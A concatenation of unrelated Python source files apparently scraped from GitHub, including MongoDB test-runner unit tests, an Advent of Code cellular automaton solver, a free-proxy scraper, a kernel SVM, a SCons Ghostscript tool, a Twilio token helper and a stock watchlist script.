num_repeat_tests = 1
queue = _queue.Queue()
suite_options = self.get_suite_options(num_repeat_tests=num_repeat_tests)
mock_time = MockTime(1)
job_object = UnitJob(suite_options)
self.queue_tests(self.TESTS, queue, queue_element.QueueElem, suite_options)
job_object._get_time = mock_time.time
job_object._run(queue, self.mock_interrupt_flag())
self.assertEqual(job_object.total_test_num, num_repeat_tests * len(self.TESTS))
for test in self.TESTS:
self.assertEqual(job_object.tests[test], num_repeat_tests)
def test__run_time_repeat_time_no_min_max(self):
increment = 1
time_repeat_tests_secs = 10
expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
queue = _queue.Queue()
suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs)
mock_time = MockTime(increment)
job_object = UnitJob(suite_options)
self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
job_object._get_time = mock_time.time
job_object._run(queue, self.mock_interrupt_flag())
self.assertEqual(job_object.total_test_num, expected_tests_run * len(self.TESTS))
for test in self.TESTS:
self.assertEqual(job_object.tests[test], expected_tests_run)
def test__run_time_repeat_time_no_min(self):
increment = 1
time_repeat_tests_secs = 10
num_repeat_tests_max = 100
expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
queue = _queue.Queue()
suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
num_repeat_tests_max=num_repeat_tests_max)
mock_time = MockTime(increment)
job_object = UnitJob(suite_options)
self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
job_object._get_time = mock_time.time
job_object._run(queue, self.mock_interrupt_flag())
self.assertLess(job_object.total_test_num, num_repeat_tests_max * len(self.TESTS))
for test in self.TESTS:
self.assertEqual(job_object.tests[test], expected_tests_run)
def test__run_time_repeat_time_no_max(self):
increment = 1
time_repeat_tests_secs = 10
num_repeat_tests_min = 1
expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
queue = _queue.Queue()
suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
num_repeat_tests_min=num_repeat_tests_min)
mock_time = MockTime(increment)
job_object = UnitJob(suite_options)
self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
job_object._get_time = mock_time.time
job_object._run(queue, self.mock_interrupt_flag())
self.assertGreater(job_object.total_test_num, num_repeat_tests_min * len(self.TESTS))
for test in self.TESTS:
self.assertEqual(job_object.tests[test], expected_tests_run)
def test__run_time_repeat_time(self):
increment = 1
time_repeat_tests_secs = 10
num_repeat_tests_min = 1
num_repeat_tests_max = 100
expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
queue = _queue.Queue()
suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
num_repeat_tests_min=num_repeat_tests_min,
num_repeat_tests_max=num_repeat_tests_max)
mock_time = MockTime(increment)
job_object = UnitJob(suite_options)
self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
job_object._get_time = mock_time.time
job_object._run(queue, self.mock_interrupt_flag())
self.assertGreater(job_object.total_test_num, num_repeat_tests_min * len(self.TESTS))
self.assertLess(job_object.total_test_num, num_repeat_tests_max * len(self.TESTS))
for test in self.TESTS:
self.assertEqual(job_object.tests[test], expected_tests_run)
def test__run_time_repeat_min(self):
increment = 1
time_repeat_tests_secs = 2
num_repeat_tests_min = 3
num_repeat_tests_max = 100
queue = _queue.Queue()
suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
num_repeat_tests_min=num_repeat_tests_min,
num_repeat_tests_max=num_repeat_tests_max)
mock_time = MockTime(increment)
job_object = UnitJob(suite_options)
self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
job_object._get_time = mock_time.time
job_object._run(queue, self.mock_interrupt_flag())
self.assertEqual(job_object.total_test_num, num_repeat_tests_min * len(self.TESTS))
for test in self.TESTS:
self.assertEqual(job_object.tests[test], num_repeat_tests_min)
def test__run_time_repeat_max(self):
increment = 1
time_repeat_tests_secs = 30
num_repeat_tests_min = 1
num_repeat_tests_max = 10
expected_time_repeat_tests = self.expected_run_num(time_repeat_tests_secs, increment)
queue = _queue.Queue()
suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
num_repeat_tests_min=num_repeat_tests_min,
num_repeat_tests_max=num_repeat_tests_max)
mock_time = MockTime(increment)
job_object = UnitJob(suite_options)
self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
job_object._get_time = mock_time.time
job_object._run(queue, self.mock_interrupt_flag())
self.assertEqual(job_object.total_test_num, num_repeat_tests_max * len(self.TESTS))
for test in self.TESTS:
self.assertEqual(job_object.tests[test], num_repeat_tests_max)
self.assertLess(job_object.tests[test], expected_time_repeat_tests)
class MockTime(object):
"""Class to mock time.time."""
def __init__(self, increment):
"""Initialize with an increment which simulates a time increment."""
self._time = 0
self._increment = increment
def time(self):
"""Simulate time.time by incrementing for every invocation."""
cur_time = self._time
self._time += self._increment
return cur_time
class UnitJob(job.Job):
def __init__(self, suite_options):
super(UnitJob, self).__init__(0, logging.getLogger("job_unittest"), None, [], None, None,
suite_options, logging.getLogger("job_unittest"))
self.total_test_num = 0
self.tests = {}
def _execute_test(self, test, hook_failure_flag=None):
self.total_test_num += 1
if test.test_name not in self.tests:
self.tests[test.test_name] = 0
self.tests[test.test_name] += 1
class TestFixtureSetupAndTeardown(unittest.TestCase):
"""Test cases for error handling around setup_fixture() and teardown_fixture()."""
def setUp(self):
logger = logging.getLogger("job_unittest")
self.__job_object = job.Job(job_num=0, logger=logger, fixture=None, hooks=[], report=None,
archival=None, suite_options=None, test_queue_logger=logger)
self.__context = Context(trace_id=0, span_id=0, is_remote=False)
# Initialize the Job instance such that its setup_fixture() and teardown_fixture() methods
# always indicate success. The settings for these mocked method will be changed in the
# individual test cases below.
self.__job_object.manager.setup_fixture = mock.Mock(return_value=True)
self.__job_object.manager.teardown_fixture = mock.Mock(return_value=True)
def __assert_when_run_tests(self, setup_succeeded=True, teardown_succeeded=True):
queue = _queue.Queue()
interrupt_flag = threading.Event()
setup_flag = threading.Event()
teardown_flag = threading.Event()
self.__job_object(queue, interrupt_flag, self.__context, setup_flag, teardown_flag)
self.assertEqual(setup_succeeded, not interrupt_flag.is_set())
self.assertEqual(setup_succeeded, not setup_flag.is_set())
self.assertEqual(teardown_succeeded, not teardown_flag.is_set())
# teardown_fixture() should be called even if setup_fixture() raises an exception.
self.__job_object.manager.setup_fixture.assert_called()
self.__job_object.manager.teardown_fixture.assert_called()
def test_setup_and_teardown_both_succeed(self):
self.__assert_when_run_tests()
def test_setup_returns_failure(self):
self.__job_object.manager.setup_fixture.return_value = False
self.__assert_when_run_tests(setup_succeeded=False)
def test_setup_raises_logging_config_exception(self):
self.__job_object.manager.setup_fixture.side_effect = errors.LoggerRuntimeConfigError(
"Logging configuration error intentionally raised in unit test")
self.__assert_when_run_tests(setup_succeeded=False)
def test_setup_raises_unexpected_exception(self):
self.__job_object.manager.setup_fixture.side_effect = Exception(
"Generic error intentionally raised in unit test")
self.__assert_when_run_tests(setup_succeeded=False)
def test_teardown_returns_failure(self):
self.__job_object.manager.teardown_fixture.return_value = False
self.__assert_when_run_tests(teardown_succeeded=False)
def test_teardown_raises_logging_config_exception(self):
self.__job_object.manager.teardown_fixture.side_effect = errors.LoggerRuntimeConfigError(
"Logging configuration error intentionally raised in unit test")
self.__assert_when_run_tests(teardown_succeeded=False)
def test_teardown_raises_unexpected_exception(self):
self.__job_object.manager.teardown_fixture.side_effect = Exception(
"Generic error intentionally raised in unit test")
self.__assert_when_run_tests(teardown_succeeded=False)
class TestNoOpFixtureSetupAndTeardown(unittest.TestCase):
"""Test cases for NoOpFixture handling in setup_fixture() and teardown_fixture()."""
def setUp(self):
self.logger = logging.getLogger("job_unittest")
fixturelib = FixtureLib()
self.__noop_fixture = _fixtures.NoOpFixture(logger=self.logger, job_num=0,
fixturelib=fixturelib)
self.__noop_fixture.setup = mock.Mock()
self.__noop_fixture.teardown = mock.Mock()
test_report = mock.Mock()
test_report.find_test_info().status = "pass"
self.__job_object = job.Job(job_num=0, logger=self.logger, fixture=self.__noop_fixture,
hooks=[], report=test_report, archival=None, suite_options=None,
test_queue_logger=self.logger)
def test_setup_called_for_noop_fixture(self):
self.assertTrue(self.__job_object.manager.setup_fixture(self.logger))
self.__noop_fixture.setup.assert_called_once_with()
def test_teardown_called_for_noop_fixture(self):
self.assertTrue(self.__job_object.manager.teardown_fixture(self.logger))
self.__noop_fixture.teardown.assert_called_once_with(finished=True)
| mongodb/mongo | buildscripts/tests/resmokelib/testing/test_job.py | test_job.py | py | 13,936 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "mock.Mock",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"l... |
24340323309 | from PySide2.QtWidgets import QApplication
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import QFile
import DCT,DFT,histogram_equalization,gray,nose,buguize,duishu,gamma,test_fenge,test_kuang,test_face3,junzhi
class Stats:
def __init__(self):
qufile_stats=QFile('GUI1.ui')
qufile_stats.open(QFile.ReadOnly)
qufile_stats.close()
self.ui = QUiLoader().load(qufile_stats)
self.ui.runButton.clicked.connect(self.run)
def path(self):
from PySide2.QtWidgets import QFileDialog
filePath, _ = QFileDialog.getOpenFileName(
self.ui, # 父窗口对象
"选择你的图片", # 标题
r"d:\\data", # 起始目录
"图片类型 (*.png *.jpg *.bmp)" # 选择类型过滤项,过滤内容在括号中
)
return (filePath)
def run(self):
if self.ui.DCTButton.isChecked():
DCT.DCT1(self.path())
if self.ui.DFTButton.isChecked():
DFT.DFT1(self.path())
if self.ui.zhifangButton.isChecked():
histogram_equalization.his_eq(self.path())
if self.ui.noseButton.isChecked():
nose.addnoise(self.path())
if self.ui.grayButton.isChecked():
gray.gray1(self.path())
if self.ui.buguize.isChecked():
buguize.buguize(self.path())
if self.ui.duishu.isChecked():
buguize.buguize(self.path())
if self.ui.gamma.isChecked():
gamma.gamma(self.path())
if self.ui.junzhi.isChecked():
junzhi.junzhi(self.path())
if self.ui.face.isChecked():
test_face3.face(self.path())
if self.ui.fenge.isChecked():
test_fenge.fenge(self.path())
if self.ui.kuang.isChecked():
test_kuang.kuang(self.path())
app = QApplication([])
stats = Stats()
stats.ui.show()
app.exec_() | lightning-skyz/test1 | GUI.py | GUI.py | py | 1,906 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PySide2.QtCore.QFile",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "PySide2.QtCore.QFile.ReadOnly",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "PySide2.QtCore.QFile",
"line_number": 8,
"usage_type": "name"
},
{
"api_nam... |
17106762661 | import os
import copy
from typing import Set
from collections import defaultdict
inputPath = os.path.join(os.path.dirname(__file__), "input")
with open(inputPath, "r") as inputFile:
lines = [line.strip() for line in inputFile.readlines() if line.strip()]
class Pos:
def __init__(self, x: int, y: int, z: int) -> None:
self.x = x
self.y = y
self.z = z
def neighbours(self, reach=1, includeSelf=False):
if includeSelf:
for zi in range(-reach, reach + 1, 1):
for yi in range(-reach, reach + 1, 1):
for xi in range(-reach, reach + 1, 1):
yield Pos(self.x + xi, self.y + yi, self.z + zi)
else:
for zi in range(-reach, reach + 1, 1):
for yi in range(-reach, reach + 1, 1):
for xi in range(-reach, reach + 1, 1):
if not (zi == 0 and yi == 0 and xi == 0):
yield Pos(self.x + xi, self.y + yi, self.z + zi)
def __hash__(self) -> int:
return hash(repr(self))
def __eq__(self, o) -> bool:
return self.x == o.x and self.y == o.y and self.z == o.z
def __str__(self) -> str:
return "(%s,%s,%s)" % (self.x, self.y, self.z)
__repr__ = __str__
class HyperPos(Pos):
def __init__(self, x: int, y: int, z: int, w: int) -> None:
super(HyperPos, self).__init__(x, y, z)
self.w = w
def neighbours(self, reach=1, includeSelf=False):
if includeSelf:
for zi in range(-reach, reach + 1, 1):
for yi in range(-reach, reach + 1, 1):
for xi in range(-reach, reach + 1, 1):
for wi in range(-reach, reach + 1, 1):
yield HyperPos(self.x + xi, self.y + yi, self.z + zi, self.w + wi)
else:
for zi in range(-reach, reach + 1, 1):
for yi in range(-reach, reach + 1, 1):
for xi in range(-reach, reach + 1, 1):
for wi in range(-reach, reach + 1, 1):
if not (zi == 0 and yi == 0 and xi == 0 and wi == 0):
yield HyperPos(self.x + xi, self.y + yi, self.z + zi, self.w + wi)
def __hash__(self) -> int:
return hash(repr(self))
def __eq__(self, o) -> bool:
return self.x == o.x and self.y == o.y and self.z == o.z and self.w == o.w
def __str__(self) -> str:
return "(%s,%s,%s,%s)" % (self.x, self.y, self.z, self.w)
__repr__ = __str__
class Dimension:
def __init__(self, cubes: Set[Pos]):
self.cubes = cubes
@staticmethod
def FromLines(lines):
cubes: Set[Pos] = set()
for y, line in enumerate(lines):
for x, char in enumerate(list(line)):
active = char == "#"
if active:
pos = Pos(x, y, 0)
cubes.add(pos)
return Dimension(cubes)
def neighbourhood(self) -> Set[Pos]:
neighbourhood = set()
for cube in self.cubes:
for neighbour in cube.neighbours(reach=1, includeSelf=True):
neighbourhood.add(neighbour)
return neighbourhood
def isActive(self, pos: Pos) -> bool:
return pos in self.cubes
def neighboursActiveInRange(self, pos: Pos, min=None, max=None):
activeNeighbours = 0
for neighbour in pos.neighbours(reach=1):
if self.isActive(neighbour):
activeNeighbours += 1
if activeNeighbours > max:
return False
return activeNeighbours >= min
def firstRule(self, cube: Pos) -> bool:
"""Return True if the cube shall be activated by the first rule:
The cube must be active.
If exactly 2 or 3 neighbors are active, the cube remains active.
Otherwise, the cube becomes inactive.
"""
assert self.isActive(cube)
return self.neighboursActiveInRange(cube, min=2, max=3)
def secondRule(self, cube: Pos) -> bool:
"""Return True if the cube shall be activated by the second rule:
The cube must be inactive.
If exactly 3 neighbors are active, the cube becomes active.
Otherwise, the cube remains inactive.
"""
assert not self.isActive(cube)
return self.neighboursActiveInRange(cube, min=3, max=3)
def layer(self, z: int) -> str:
radius = len(lines[0]) * 2
center = int((len(lines[0])) / 2)
cubes = [["." for i in range(radius)] for i in range(radius)]
for cube in [c for c in self.cubes if c.z == z]:
cubes[cube.y + center][cube.x + center] = "#"
return "\n".join("".join(c) for c in cubes)
def cycle(self):
buffer = set()
for pos in self.neighbourhood():
if self.isActive(pos):
if self.firstRule(pos):
buffer.add(pos)
else:
if self.secondRule(pos):
buffer.add(pos)
self.cubes = copy.deepcopy(buffer)
class HyperDimension(Dimension):
@staticmethod
def FromLines(lines):
cubes: Set[HyperPos] = set()
for y, line in enumerate(lines):
for x, char in enumerate(list(line)):
active = char == "#"
if active:
pos = HyperPos(x, y, 0, 0)
cubes.add(pos)
return HyperDimension(cubes)
def layer(self, z: int, w: int) -> str:
radius = len(lines[0]) * 2
center = int((len(lines[0])) / 2)
cubes = [["." for i in range(radius)] for i in range(radius)]
for cube in [c for c in self.cubes if c.z == z and c.w == w]:
cubes[cube.y + center][cube.x + center] = "#"
return "\n".join("".join(c) for c in cubes)
def cycle(self):
buffer = set()
for pos in self.neighbourhood():
if self.isActive(pos):
if self.firstRule(pos):
buffer.add(pos)
else:
if self.secondRule(pos):
buffer.add(pos)
self.cubes = copy.deepcopy(buffer)
def solve1():
dim = Dimension.FromLines(lines)
print(dim.layer(0))
dim.cycle()
dim.cycle()
dim.cycle()
dim.cycle()
dim.cycle()
dim.cycle()
return len(dim.cubes)
def solve2():
dim = HyperDimension.FromLines(lines)
print(dim.layer(0, 0))
dim.cycle()
dim.cycle()
dim.cycle()
dim.cycle()
dim.cycle()
dim.cycle()
return len(dim.cubes)
print(solve1())
print(solve2())
| mmmaxou/advent-of-code | 2020/day-17/answer.py | answer.py | py | 6,664 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "typing.Set",
"line_number"... |
37695484761 | from random import randint
from concurrent.futures import ThreadPoolExecutor as pool
import random
import os
import subprocess
import re
import requests
import json
import time
class Prox:
def __init__(self):
self.alive=[]
self.unfiltered=[]
self.get_proxy('https://free-proxy-list.net')
self.get_proxy('https://www.us-proxy.org/')
self.get_proxy('https://www.sslproxies.org/')
self.get_proxy('http://spys.me/proxy.txt')
self.unfiltered=list(set(self.unfiltered))
print('Total valid proxies>>>')
print(len(self.unfiltered))
time.sleep(3)
def get_proxy(self,url):
pl=[]
try:
res=requests.get(url)
html=res.content.decode()
try:
pl=re.findall(r'<td>(\d+\.\d+\.\d+\.\d+)</td><td>(\d+)</td>',html)
if not len(pl):
print('now collecting>>>')
time.sleep(1)
pl=re.findall(r'(\d+\.\d+\.\d+\.\d+):(\d+)',html)
try:
pl=[x[0]+':'+x[1] for x in pl]
except:
print('no proxy found')
self.unfiltered += pl
print(pl)
except:
print('line 40')
print(len(self.unfiltered))
except Exception as e:
print('ERROR AT GET PROXY')
print(str(e))
def collect(self):
with pool(max_workers=1000) as exc:
exc.map(self.check_proxy,self.unfiltered)
print(len(set(self.alive)))
def check_proxy(self,x):
for _ in range(3):
try:
#print('TRYING PROXY: '+x)
proxies= {
'http':'http://'+ x,
'https':'https://'+ x,
}
r = requests.get('https://www.google.com/humans.txt',
timeout=3,
proxies = proxies
)
if r.status_code == 200:
print(x)
self.alive.append(x)
return
except:
pass
print('dropping '+x)
#print(f'TRYING ANOTHER PROXY....PROXY NO.{i+1}')
if __name__=='__main__':
r=Prox()
r.collect()
with open('fresh_proxy.txt','a') as f:
for i in r.alive:
f.write(i+'\n') | adnangif/getproxy | getproxy.py | getproxy.py | py | 2,645 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.sleep",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 43... |
27969273118 | import numpy as np
from scipy import optimize
class KernelSVC:
def __init__(self, C, kernel, epsilon=1e-3):
self.type = 'non-linear'
self.C = C
self.kernel = kernel
self.alpha = None
self.support = None
self.epsilon = epsilon
self.norm_f = None
self.Nfeval = 0
def fit(self, X, y):
y = 2 * (y - 0.5)
N = len(y)
self.support = X
M = self.kernel(X, X)
# Lagrange dual problem
def loss(alpha):
Y = np.diag(y)
AY = Y @ alpha
return -np.sum(alpha) + AY.T @ (M @ AY) / 2
# Partial derivate of Ld on alpha
def grad_loss(alpha):
Y = np.diag(y)
AY = Y @ alpha
return -np.ones(len(alpha)) + Y @ (M @ AY)
fun_eq = lambda alpha: np.sum(alpha * y)
jac_eq = lambda alpha: y
fun_ineq1 = lambda alpha: self.C - alpha
jac_ineq1 = lambda alpha: -np.identity(len(alpha))
fun_ineq2 = lambda alpha: alpha
jac_ineq2 = lambda alpha: np.identity(len(alpha))
constraints = ({'type': 'eq', 'fun': fun_eq, 'jac': jac_eq},
{'type': 'ineq', 'fun': fun_ineq1, 'jac': jac_ineq1},
{'type': 'ineq', 'fun': fun_ineq2, 'jac': jac_ineq2})
optRes = optimize.minimize(fun=lambda alpha: loss(alpha),
x0=np.ones(N),
method='SLSQP',
jac=lambda alpha: grad_loss(alpha),
constraints=constraints,
callback=self.callbackF,
options={"maxiter":50, 'disp':True})
self.alpha = optRes.x
## Assign the required attributes
Y = np.diag(y)
AY = Y @ self.alpha
self.margin_points = [X[p] for p in np.where((self.alpha > self.epsilon) & (self.alpha < self.C - self.epsilon))[0]]
self.b = np.mean(y[np.where((self.alpha > self.epsilon) & (self.alpha < self.C - self.epsilon))[0]]
- self.kernel(self.margin_points,X) @ AY)
self.norm_f = np.sqrt(AY.T @ M @ AY)
self.alpha = AY
### Implementation of the separting function $f$
def separating_function(self, x):
return self.kernel(x, self.support) @ self.alpha
def predict(self, X):
d = self.separating_function(X)
# return 2 * (d + self.b > 0) - 1
return 1 / (1 + np.exp(-(d+self.b)))
def callbackF(self, Xi):
print(self.Nfeval)
self.Nfeval += 1
| Zero-4869/Kernel-methods | classifier.py | classifier.py | py | 2,631 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.diag",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.diag",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 33,
... |
36947774959 | __revision__ = "src/engine/SCons/Tool/gs.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
import SCons.Action
import SCons.Builder
import SCons.Platform
import SCons.Util
# Ghostscript goes by different names on different platforms...
platform = SCons.Platform.platform_default()
if platform == 'os2':
gs = 'gsos2'
elif platform == 'win32':
gs = 'gswin32c'
else:
gs = 'gs'
GhostscriptAction = None
def generate(env):
"""Add Builders and construction variables for Ghostscript to an
Environment."""
global GhostscriptAction
# The following try-except block enables us to use the Tool
# in standalone mode (without the accompanying pdf.py),
# whenever we need an explicit call of gs via the Gs()
# Builder ...
try:
if GhostscriptAction is None:
GhostscriptAction = SCons.Action.Action('$GSCOM', '$GSCOMSTR')
from SCons.Tool import pdf
pdf.generate(env)
bld = env['BUILDERS']['PDF']
bld.add_action('.ps', GhostscriptAction)
except ImportError as e:
pass
gsbuilder = SCons.Builder.Builder(action = SCons.Action.Action('$GSCOM', '$GSCOMSTR'))
env['BUILDERS']['Gs'] = gsbuilder
env['GS'] = gs
env['GSFLAGS'] = SCons.Util.CLVar('-dNOPAUSE -dBATCH -sDEVICE=pdfwrite')
env['GSCOM'] = '$GS $GSFLAGS -sOutputFile=$TARGET $SOURCES'
def exists(env):
if 'PS2PDF' in env:
return env.Detect(env['PS2PDF'])
else:
return env.Detect(gs) or SCons.Util.WhereIs(gs)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mongodb/mongo | src/third_party/scons-3.1.2/scons-local-3.1.2/SCons/Tool/gs.py | gs.py | py | 1,659 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "SCons.Action.Platform.platform_default",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "SCons.Action.Platform",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "SCons.Action",
"line_number": 9,
"usage_type": "name"
},
{
"api_n... |
7638888119 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 29 17:03:06 2014
@author: aaron
"""
import neblina as nb ### Module for neblina interpreter.
import operators as op ### Module for operators functions.
import ioFunctions as io ### Module for write on disk functions.
import gnuplot as gnuplot ### Module for Gnuplot functions.
import config as cfg ### Module for global variables for Quantum Walk.
import standardDeviation as sd ### Module for Standard Deviation functions.
import numpy as np
import testmode
def run():
probabilities=[]
if not cfg.OVERLAP:
cfg.OVERLAPX=int(cfg.TESSELLATIONPOLYGONS[0])
io.savetxt("HIPERWALK_TEMP_PSI.dat",cfg.STATE,float,'%1.16f')
op.STAGGERED1D()
sd.distances_vector_1D(cfg.RANGEX[0],cfg.RANGEX[1])
cfg.DISTANCE_VECTOR_SIZE=cfg.GRAPHSIZE
# nb.generating_STAGGERED1D_NBL()
nb.runCore_STAGGERED1D()
cfg.STATE=nb.neblina_state_to_vector("NEBLINA_TEMP_final_state.dat")
probabilities=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
output = open("final_distribution.dat",'w')
output1 = open("final_state.dat",'w')
output.write("#POSITION \t PROBABILITY\n")
output1.write("#POSITION \t Re(amplitude) \t \t \t Im(amplitude)\n")
for i in range(int(cfg.GRAPHSIZE)):
output.write("%d \t \t \t%1.16f\n"%(cfg.RANGEX[0]+i,probabilities[i]))
output1.write("%d \t \t \t%1.16f\t\t\t%1.16f\n"%(cfg.RANGEX[0]+i,cfg.STATE[i].real,cfg.STATE[i].imag))
output.close()
output1.close()
if cfg.GNUPLOT:
io.savetxt("HIPERWALK_TEMP_PROBABILITIES.dat",probabilities,float,'%1.16f')
gnuplot.template_STAGGERED1D("HIPERWALK_TEMP_PROBABILITIES.dat","final_distribution.eps","EPS")
if cfg.STEPS>1:
gnuplot.plotStatistics1D()
if cfg.ANIMATION == 1:
gnuplot.plotAnimation1D()
if cfg.TEST_MODE:
modelVector=testmode.create_STAGGERED1D_test_vector()
returnNeblina=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
if np.linalg.norm(modelVector-returnNeblina,np.inf) == float(0):
return 1
else:
return 0
return 1 | hiperwalk/hiperwalk | Archive/staggered1d.py | staggered1d.py | py | 2,333 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "config.OVERLAP",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "config.OVERLAPX",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "config.TESSELLATIONPOLYGONS",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_nam... |
30221585975 | from bs4 import BeautifulSoup
import requests
import csv
import pandas as pd
import os
source = requests.get('https://www.centuryply.com/centurylaminates/')
soup = BeautifulSoup(source.content, 'lxml')
for main in soup.select('li.dropdown-submenu'):
for a_link in main.find_all('a'):
try:
t_link = a_link['href'].replace('#','')
f_name = t_link.replace('.php','')
m_link = f'https://www.centuryply.com/centurylaminates/{t_link}'
folder_location = f'./data/{f_name}'
if not os.path.exists(folder_location):
os.mkdir(folder_location)
source = requests.get(m_link)
soup = BeautifulSoup(source.content, 'lxml')
for src in soup.find_all('div',class_='product-meta'):
links = src.a
link =links.find_next('a')['href']
link = f'https://www.centuryply.com/centurylaminates/{link}'
#print(link)
source = requests.get(link)
soup = BeautifulSoup(source.content, 'lxml')
print(f'>> {link}')
img = soup.find('div',class_='product-img').a['bg-image']
prod_img = f'https://www.centuryply.com/centurylaminates/{img}'
print(prod_img)
name = soup.find('div',class_='product-heading').h1.text
name = f' {name} '
print(name)
desc = soup.find('div',class_='product-description').p.text
print(desc)
f_name = name.replace(' ','_')
filenames = f'{folder_location}/{f_name}.csv'
with open(filenames , 'w') as csv_file:
csv_writer = csv.writer(csv_file)
csv_writer.writerow(['Prod_link ',' Name ',' Images ', ' Prod_Desc '])
csv_writer.writerow([link , name , prod_img , desc])
print(csv_file.closed)
except:
print('')
| jhankarnarang/Century-Plywood-Web-Scraping | Century Laminates/main.py | main.py | py | 2,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_numbe... |
74060635624 | """
Twilio API NTS token
"""
import asyncio
from functools import partial
from twilio.rest import Client as TwilioRestClient
from server.config import config
class TwilioNTS:
"""
Twilio NTS Token Service
Creates new twilio NTS tokens
"""
def __init__(self, sid=None, token=None):
if sid is None:
sid = config.TWILIO_ACCOUNT_SID # pragma: no cover
if token is None:
token = config.TWILIO_TOKEN # pragma: no cover
self.twilio_account_sid = sid
self.twilio_token = token
self.client = TwilioRestClient(self.twilio_account_sid, self.twilio_token)
async def server_tokens(self, ttl=None) -> list[dict[str]]:
"""
Fetches token from Twilio
# Params
- `ttl`: ttl in seconds
"""
if ttl is None:
ttl = config.TWILIO_TTL # pragma: no cover
loop = asyncio.get_running_loop()
token = await loop.run_in_executor(None, partial(self.client.tokens.create, ttl))
return token.ice_servers
| FAForever/server | server/ice_servers/nts.py | nts.py | py | 1,056 | python | en | code | 64 | github-code | 36 | [
{
"api_name": "server.config.config.TWILIO_ACCOUNT_SID",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "server.config.config",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "server.config.config.TWILIO_TOKEN",
"line_number": 24,
"usage_type": "a... |
19909624310 | """MAIN MODULE TO RUN"""
from datetime import datetime
import stonk_functions as func
#gets the top sector for the week
sectorOG = func.get_sector()
sector = (sectorOG.replace(' ','')).lower()
#gets todays date
day = datetime.today().strftime('%A')
if day.lower() in ("saturday", "sunday"):
day = "Friday"
today = datetime.now()
date = (f"{today.strftime('%B')} {today.day}")
"""Add Link for Criteria Here using https://finviz.com/screener.ashx"""
#the urls for stock criteria
win_sector = f"https://finviz.com/screener.ashx?v=111&f=sec_{sector},sh_avgvol_o1000,sh_price_o5,sh_relvol_o1.5,targetprice_above&ft=4"
rsi = "https://finviz.com/screener.ashx?v=211&f=sh_avgvol_o1000,sh_price_o5,ta_rsi_os30,ta_sma200_pa,targetprice_above&ft=4"
"""Add New Criteria Variable to urls Dict and assign a label"""
#dict of criteria urls and there label
urls = {win_sector: f"{sectorOG} Winners", rsi : "Oversold"}
#gets the stocks for each criteria and adds them to the stonks dict
stonks = func.get_stocks(urls)
#gets todays watchlist listing
main_str = func.get_main(day,stonks)
#gets current watchlist contents
with open("watchlist.txt", 'r') as file:
contents = file.read()
#if its Monday, start a new watchlist
if day == 'Monday':
with open("watchlist.txt", 'w') as file:
file.write(main_str + '\n')
#if its not Monday, add todays stocks to the current watchlist
else:
content_list = contents.split('\n\n')
#remove the current days entry if its there to make space for updated entry
with open("watchlist.txt", "w") as f:
for i in content_list:
if day not in i:
f.write(f"{i}\n")
f.truncate()
#add todays entry
with open("watchlist.txt", 'a') as file:
file.write(main_str + '\n')
#gets weeks updated wathlist and prints it
with open("watchlist.txt", 'r') as file:
contents = file.read()
